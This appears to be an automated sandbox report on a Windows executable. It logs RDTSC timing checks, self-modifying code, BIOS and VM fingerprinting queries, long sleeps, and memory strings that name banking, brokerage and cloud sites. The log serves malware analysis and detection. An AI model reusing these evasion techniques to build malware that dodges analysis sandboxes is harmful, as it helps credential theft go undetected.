Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53801D5 second address: 5380205 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39713h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 4A08ED47h 0x00000015 jmp 00007F4BA0D3970Ch 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380205 second address: 5380252 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a pushad 0x0000000b movzx ecx, di 0x0000000e pushad 0x0000000f movsx edi, cx 0x00000012 jmp 00007F4BA0D3F168h 0x00000017 popad 0x00000018 popad 0x00000019 test al, al 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4BA0D3F167h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380252 second address: 5380258 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380258 second address: 538025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538025C second address: 5380276 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F4BA0D398AAh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3970Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380276 second address: 53802A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ecx, dword ptr [ebp-14h] 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 mov dword ptr [ebp-14h], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53802A7 second address: 53802AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53802AB second address: 53802C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F169h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538039B second address: 53803A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53803A1 second address: 53803B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53803B4 second address: 5380484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D39719h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F4BA0D3973Bh 0x00000011 jmp 00007F4BA0D3970Eh 0x00000016 cmp dword ptr [ebp-14h], edi 0x00000019 pushad 0x0000001a mov ax, 19FDh 0x0000001e movzx eax, bx 0x00000021 popad 0x00000022 jne 00007F4C11A577AEh 0x00000028 jmp 00007F4BA0D39715h 0x0000002d mov ebx, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 movzx esi, bx 0x00000034 pushfd 0x00000035 jmp 00007F4BA0D39719h 0x0000003a adc cx, 7D26h 0x0000003f jmp 00007F4BA0D39711h 0x00000044 popfd 0x00000045 popad 0x00000046 lea eax, dword ptr [ebp-2Ch] 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007F4BA0D39713h 0x00000052 or cl, 0000005Eh 0x00000055 jmp 00007F4BA0D39719h 0x0000005a popfd 0x0000005b mov eax, 622CF927h 0x00000060 popad 0x00000061 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380484 second address: 538048A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538048A second address: 538048E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 538048E second address: 53804C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F15Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F4BA0D3F166h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53804C0 second address: 53804CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4BA0D3970Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53804CF second address: 53804E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53804E1 second address: 53804E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E23 second address: 5370E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E27 second address: 5370E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E2D second address: 5370E33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E33 second address: 5370E60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4BA0D3970Fh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F4BA0D39710h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E60 second address: 5370E66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E66 second address: 5370E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E6C second address: 5370E70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E70 second address: 5370E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F4BA0D39714h 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edx 0x00000015 mov bh, 8Fh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E97 second address: 5370E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370E9D second address: 5370ED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4BA0D39711h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4BA0D3970Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5370ED2 second address: 5370ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380A5F second address: 5380A86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 249AA07Bh 0x00000008 push esi 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f push esi 0x00000010 movsx ebx, cx 0x00000013 pop eax 0x00000014 call 00007F4BA0D39711h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380A86 second address: 5380A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov ax, bx 0x0000000d mov ax, dx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380A97 second address: 5380AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3970Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380AA8 second address: 5380AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380AAC second address: 5380AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380AB8 second address: 5380ADF instructions: 0x00000000 rdtsc 0x00000002 mov eax, 4EC02E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, 08BB9F15h 0x00000014 jmp 00007F4BA0D3F162h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380C0A second address: 5380C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3970Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4BA0D3970Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380C2C second address: 5380C67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4BA0D3F161h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4C11A42E9Ah 0x0000000f pushad 0x00000010 mov ebx, eax 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 cmp dword ptr [ebp+08h], 00002000h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4BA0D3F161h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380C67 second address: 5380C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5380C6D second address: 5380C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909C4 second address: 53909CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909CA second address: 53909CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909CF second address: 53909D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909D5 second address: 53909D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909D9 second address: 53909DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909DD second address: 53909EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, ah 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909EC second address: 53909F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909F2 second address: 53909F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909F6 second address: 53909FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 53909FA second address: 5390A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov edx, ecx 0x0000000c popad 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4BA0D3F167h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390A21 second address: 5390A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390A27 second address: 5390A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390A2B second address: 5390A2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390A2F second address: 5390ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b jmp 00007F4BA0D3F15Dh 0x00000010 pushfd 0x00000011 jmp 00007F4BA0D3F160h 0x00000016 and cx, C158h 0x0000001b jmp 00007F4BA0D3F15Bh 0x00000020 popfd 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 pushad 0x00000024 mov ebx, esi 0x00000026 call 00007F4BA0D3F160h 0x0000002b mov cx, FD91h 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 pushad 0x00000033 mov edx, ecx 0x00000035 jmp 00007F4BA0D3F166h 0x0000003a popad 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F4BA0D3F15Dh 0x00000045 sub ax, 3106h 0x0000004a jmp 00007F4BA0D3F161h 0x0000004f popfd 0x00000050 push ecx 0x00000051 pop edi 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390ACB second address: 5390B39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov bh, ch 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, dword ptr [ebp+0Ch] 0x0000000d jmp 00007F4BA0D39717h 0x00000012 test esi, esi 0x00000014 jmp 00007F4BA0D39716h 0x00000019 je 00007F4C11A36FB6h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F4BA0D3970Dh 0x00000028 and ecx, 530A2D26h 0x0000002e jmp 00007F4BA0D39711h 0x00000033 popfd 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390BDF second address: 5390BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4BA0D3F15Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe RDTSC instruction interceptor: First address: 5390BEF second address: 5390BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Special instruction interceptor: First address: E47C6C instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Special instruction interceptor: First address: EC8E87 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7508 Thread sleep time: -34017s >= -30000s
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7604 Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7496 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7504 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe TID: 7484 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\Desktop\jSFUzuYPG9.exe Last function: Thread delayed
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696503903o
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: jSFUzuYPG9.exe, jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000002.1976312464.00000000015F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: jSFUzuYPG9.exe, 00000000.00000002.1976312464.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377203938.0000000001643000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1377077229.0000000001640000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1555875231.000000000164C000.00000004.00000020.00020000.00000000.sdmp, jSFUzuYPG9.exe, 00000000.00000003.1496785722.000000000164C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: Amcache.hve.5.dr Binary or memory string: vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696503903s
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.5.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.5.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696503903j
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696503903f
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E44000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696503903p
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: jSFUzuYPG9.exe, 00000000.00000002.1974867741.0000000000E28000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.5.dr Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.5.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696503903
Source: jSFUzuYPG9.exe, 00000000.00000003.1427425221.0000000005E3E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696503903
